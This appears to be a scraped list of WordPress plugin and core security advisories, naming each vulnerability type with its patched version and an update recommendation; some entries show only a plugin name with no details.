Plugin: Phone Orders for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: HTML5 Webcam/Screen/Mic Recorder for Video Comments and Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.55.3
Recommended Action: Update to version 1.55.3, or a newer patched version

Plugin: MasterStudy LMS WordPress Plugin – for Online Courses and Education

Vulnerability: Missing Authorization via wp_ajax_stm_wpcfto_get_settings
Patched Version: 2.9.35
Recommended Action: Update to version 2.9.35, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.6
Recommended Action: Update to version 3.8.6, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Arbitrary File Upload
Patched Version: 8.0.8
Recommended Action: Update to version 8.0.8, or a newer patched version

Plugin: Permalink Manager Lite

Vulnerability: Admin+ SQL Injection
Patched Version: 2.2.13.1
Recommended Action: Update to version 2.2.13.1, or a newer patched version

Plugin: Raygun

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Flagallery-skins

Plugin: User Private Files – File Upload & Download Manager with Secure File Sharing

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Smart Post Show – Post Grid, Post Carousel, Post Slider, Post Timeline, Post Table, and List Category Posts, Latest Posts, Recent Posts, Popular Posts and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.4.19
Recommended Action: Update to version 2.4.19, or a newer patched version

Plugin: Limit Login Attempts Reloaded

Vulnerability: Missing Authorization
Patched Version: 2.25.26
Recommended Action: Update to version 2.25.26, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: CSV injection via a customer’s profile
Patched Version: 1.16.3.6
Recommended Action: Update to version 1.16.3.6, or a newer patched version

Plugin: Popup Like box – Page Plugin

Vulnerability: SQL Injection
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: Easy Testimonial Manager

Plugin: Quotes llama

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘type’
Patched Version: 1.12.4
Recommended Action: Update to version 1.12.4, or a newer patched version

Plugin: Get Custom Field Values

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin widget
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Transposh WordPress Translation

Plugin: Republish Old Posts

Vulnerability: Cross-Site Request Forgery via rop_options_page
Patched Version: 1.27
Recommended Action: Update to version 1.27, or a newer patched version

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: SQL Injection
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Bold Page Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Plugin: Community Events

Vulnerability: Authenticated (Administrator+) Stored Cross Site Scripting
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Image Slider by NextCode – Photo & Video Slider

Plugin: Windows Desktop and iPhone Photo Uploader

Plugin: PWGRandom

Plugin: Download Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Table of Contents Plus

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2212
Recommended Action: Update to version 2212, or a newer patched version

Plugin: Import WP – Export and Import CSV and XML files to WordPress

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Flexible Elementor Panel

Vulnerability: Cross Site Request Forgery
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization in ‘wpfc_purgecache_varnish_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: WP To Do

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: YITH WooCommerce Gift Cards Premium

Vulnerability: Missing Authorization
Patched Version: 3.24.0
Recommended Action: Update to version 3.24.0, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 9.0.16
Recommended Action: Update to version 9.0.16, or a newer patched version

Plugin: Social Rocket – Social Sharing Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.10
Recommended Action: Update to version 1.2.10, or a newer patched version

Plugin: Uji Popup

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via uji_popup_code shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Authenticated PHP4 Upload
Patched Version: 5.11.1
Recommended Action: Update to version 5.11.1, or a newer patched version

Plugin: SMSA Shipping for WooCommerce

Vulnerability: Authenticated (Subscriber+) Arbitrary File Download
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Widget Shortcode

Plugin: AFI – The Easiest Integration Plugin

Vulnerability: Authenticated (Admin+) Cross Site Scripting
Patched Version: 1.63.0
Recommended Action: Update to version 1.63.0, or a newer patched version

Plugin: Coming Soon, Under Construction & Maintenance Mode By Dazzler

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Torro Forms

Plugin: BlossomThemes Email Newsletter

Vulnerability: Missing Authorization
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Vision – Interactive Image Map Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Staff / Employee Business Directory for Active Directory

Vulnerability: Authenticated (Admin+) LDAP Passback
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Simple:Press Forum

Vulnerability: Authenticated (Admin+) Path Traversal to Arbitrary File Modification
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: SQL Injection
Patched Version: 1.8.10.2
Recommended Action: Update to version 1.8.10.2, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Authenticated (Author+) Open Redirect
Patched Version: 6.9.19
Recommended Action: Update to version 6.9.19, or a newer patched version

Plugin: Portfolio, Gallery, Product Catalog – Grid KIT Portfolio

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Pinterest RSS Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.27
Recommended Action: Update to version 1.0.27, or a newer patched version

Plugin: Essential Blocks Pro

Vulnerability: Unauthenticated PHP Object Injection via products
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 7.1.03
Recommended Action: Update to version 7.1.03, or a newer patched version

Plugin: Insert Pages

Vulnerability: Contributor+ Arbitrary Posts/Pages Access
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Fast Flow

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: Amministrazione Trasparente

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 8.0.5
Recommended Action: Update to version 8.0.5, or a newer patched version

Plugin: Featured Image Pro Post Grid

Vulnerability: Reflected Cross-Site Scripting via page
Patched Version: 5.15
Recommended Action: Update to version 5.15, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: Font Awesome 4 Menus

Plugin: Active Products Tables for WooCommerce. Use constructor to create tables

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.6.1
Recommended Action: Update to version 1.0.6.1, or a newer patched version

Plugin: Eupago Gateway For Woocommerce

Vulnerability: Cross-Site Request Forgery via eupago_page_content
Patched Version: 3.1.10
Recommended Action: Update to version 3.1.10, or a newer patched version

Plugin: WordPress Landing Pages

Vulnerability: Unauthenticated Remote Command Execution
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Core: WordPress

Vulnerability: Username Enumeration via Error Messages
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Food Store – Online Food Delivery & Pickup

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via ‘mf_transaction_id’ shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: WP-CopyProtect [Protect your blog posts]

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: WordPress Contact Form, Drag and Drop Form Builder Plugin – Live Forms

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: MSync

Plugin: Easy Social Icons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Unauthenticated Views Changes
Patched Version: 6.1.0
Recommended Action: Update to version 6.1.0, or a newer patched version

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via header_tag
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.9.3
Recommended Action: Update to version 4.9.3, or a newer patched version

Plugin: WordPress Mobile Pack – Mobile Plugin for Progressive Web Apps & Hybrid Mobile Apps

Plugin: Easy2Map

Vulnerability: Directory Traversal and Local File Inclusion
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Advanced Text Widget

Plugin: Convert to Blocks

Vulnerability: Prototype Pollution
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: CM Download Manager – Document and File Management

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Authenticated Shell Upload
Patched Version: 4.22
Recommended Action: Update to version 4.22, or a newer patched version

Plugin: WebEngage Feedback, Survey and Notification

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Core: WordPress

Vulnerability: PHAR Unserialization
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Translate WordPress – Google Language Translator

Vulnerability: Google Language Translator <= 6.0.11
Patched Version: 6.0.12
Recommended Action: Update to version 6.0.12, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Authenticated (Contributor+) Local File Inclusion
Patched Version: 1.0.107.3
Recommended Action: Update to version 1.0.107.3, or a newer patched version

Plugin: Form Builder | Create Responsive Contact Forms

Plugin: Brizy – Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via Element URL
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: CP Reservation Calendar

Vulnerability: SQL Injection
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: YouTube Embed

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Captcha!

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Customize Login Image

Vulnerability: Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Admin+ SQL Injection
Patched Version: 17.0.5
Recommended Action: Update to version 17.0.5, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: Enable/Disable Auto Login when Register

Plugin: Tussendoor – Open RDW

Vulnerability: Reflected Cross-Site Scripting via open_data_rdw_kenteken
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: WPBakery Page Builder for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.4.1
Recommended Action: Update to version 6.4.1, or a newer patched version

Core: WordPress

Vulnerability: No subtitle
Patched Version: 4.1.39
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.39, 4.2.36, 4.3.32, 4.4.31, 4.5.30, 4.6.27, 4.7.27, 4.8.23, 4.9.24, 5.0.20, 5.1.17, 5.2.19, 5.3.16, 5.4.14, 5.5.13, 5.6.12, 5.7.10, 5.8.8, 5.9.8, 6.0.6, 6.1.4, 6.2.3, 6.3.2

Plugin: DeepL API translation plugin

Vulnerability: Cross-Site Request Forgery via saveSettings
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: HTML2WP

Plugin: CBX Map for Google Map & OpenStreetMap

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.12
Recommended Action: Update to version 1.1.12, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Banner Effect Header

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: WP Smart Import : Import any XML File to WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Website Contact Form With File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Sensitive Information Exposure
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Five Star Restaurant Reservations – WordPress Booking Plugin

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 2.4.12
Recommended Action: Update to version 2.4.12, or a newer patched version

Plugin: AgentEasy Properties

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 7.5.13
Recommended Action: Update to version 7.5.13, or a newer patched version

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Subscriber+ SQL Injection
Patched Version: 8.2
Recommended Action: Update to version 8.2, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.2.92
Recommended Action: Update to version 1.2.92, or a newer patched version

Plugin: Pagination by BestWebSoft – Customizable WordPress Content Splitter and Navigation Plugin

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: WordPress Renaming Tool by Vlajo

Vulnerability: Path Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Floating Button

Vulnerability: Cross-Site Request Forgery via process_bulk_action
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: Timed Popup WordPress Plugin

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Annual Archive

Plugin: MailUp newsletter sign-up form

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Core: WordPress MU

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Vision – Interactive Image Map Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: GTM4WP – A Google Tag Manager (GTM) plugin for WordPress

Vulnerability: Stored Cross-Site Scripting via Content Element ID
Patched Version: 1.15.2
Recommended Action: Update to version 1.15.2, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: wpDataTables (Premium)

Vulnerability: Improper Access Control leading to Table Data Deletion
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Melapress File Monitor

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.9.11
Recommended Action: Update to version 2.0.9.11, or a newer patched version

Plugin: RokIntroScroller

Vulnerability: Arbitrary File Upload
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: WP Upload Restriction

Vulnerability: Missing Authorization Checks
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Database Peek

Plugin: acf-frontend-display

Plugin: Administrator Z

Vulnerability: Unauthorized File Upload via ACF
Patched Version: 2022.9.29
Recommended Action: Update to version 2022.9.29, or a newer patched version

Plugin: Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back

Vulnerability: Cross-Site Request Forgery via cbb_submit_settings_data
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Total Donations

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Event Registration Calendar By vcita

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.1.7
Recommended Action: Update to version 5.1.7, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Open Redirect
Patched Version: 3.7.2.4
Recommended Action: Update to version 3.7.2.4, or a newer patched version

Plugin: WP Recipe Maker

Vulnerability: Reflected Cross-Site Scripting via Referer
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: Waitlist Woocommerce ( Back in stock notifier )

Vulnerability: Cross-Site Request Forgery to Settings Reset
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Authenticated (Admin+) Directory Traversal to Arbitrary File Deletion
Patched Version: 0.9.1.7
Recommended Action: Update to version 0.9.1.7, or a newer patched version

Plugin: gAppointments – Appointment booking addon for Gravity Forms

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.5.0
Recommended Action: Update to version 5.5.0, or a newer patched version

Plugin: MP3-jPlayer

Vulnerability: Full Path Disclosure
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Custom 404 Pro

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: WordPress Pinterest Plugin – Make a Popup, User Profile, Masonry and Gallery Layout

Vulnerability: Stored (Contributor+) Cross-Site Scripting via Shortcode
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.1.15
Recommended Action: Update to version 1.5.1.15, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: I Recommend This

Vulnerability: SQL Injection
Patched Version: 3.7.3
Recommended Action: Update to version 3.7.3, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: SQL Injection
Patched Version: 5.3.2
Recommended Action: Update to version 5.3.2, or a newer patched version

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: Insecure Direct Object Reference
Patched Version: 5.0.9
Recommended Action: Update to version 5.0.9, or a newer patched version

Plugin: Nextend Social Login and Register

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Database Backup for WordPress

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: GD Star Rating

Vulnerability: Blind SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Search Exclude

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Zendesk Support for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.5
Recommended Action: Update to version 1.8.5, or a newer patched version

Plugin: Forget About Shortcode Buttons

Vulnerability: Missing Authorization via fasc_buttons
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Tainacan

Vulnerability: Cross-Site Scripting
Patched Version: 0.18.10
Recommended Action: Update to version 0.18.10, or a newer patched version

Plugin: Five Minute Webshop

Vulnerability: Authenticated (Admin+) SQL Injection via orderby
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_option_id
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Core: WordPress

Vulnerability: Cache Poisoning
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.15, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: Media Library Assistant

Vulnerability: Remote Code Execution via tax_query, meta_query, date_query Parameters
Patched Version: 2.82
Recommended Action: Update to version 2.82, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Goods Catalog

Plugin: HDW WordPress Video Gallery

Vulnerability: Reflected Cross-Site Scripting via playlist parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation and Deactivation
Patched Version: 13.1.2
Recommended Action: Update to version 13.1.2, or a newer patched version

Plugin: SMS Alert Order Notifications – WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Quttera Web Malware Scanner

Vulnerability: Sensitive Data Exposure
Patched Version: 3.4.2.1
Recommended Action: Update to version 3.4.2.1, or a newer patched version

Plugin: Userback

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: WP Contact Slider – Slide Out Contact Form for WordPress to display Contact Form 7, Gravity Forms, WP Forms, Ninja Forms, plain text/HTML & other shortcodes

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: 001 Prime Strategy Translate Accelerator

Plugin: Popup Manager

Vulnerability: Missing Authorization to Arbitrary Popup Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Activity Reactions For Buddypress

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: SQL Injection
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Simple CSV/XLS Exporter

Vulnerability: CSV Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Hidden Login Bypass
Patched Version: 7.9.1
Recommended Action: Update to version 7.9.1, or a newer patched version

Plugin: Rich Table of Contents

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Code Snippets Extended

Plugin: Content Repeater – Custom Posts Simplified

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Widget
Patched Version: 1.8.19
Recommended Action: Update to version 1.8.19, or a newer patched version

Plugin: JetWidgets For Elementor

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: MagicForm

Plugin: WP Symposium

Vulnerability: Blind SQL Injection
Patched Version: 15.8
Recommended Action: Update to version 15.8, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Custom Role Creation/Deletion
Patched Version: 5.6.6
Recommended Action: Update to version 5.6.6, or a newer patched version

Plugin: wpShopGermany – Protected Shops

Vulnerability: Protected Shops <= 2.0
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

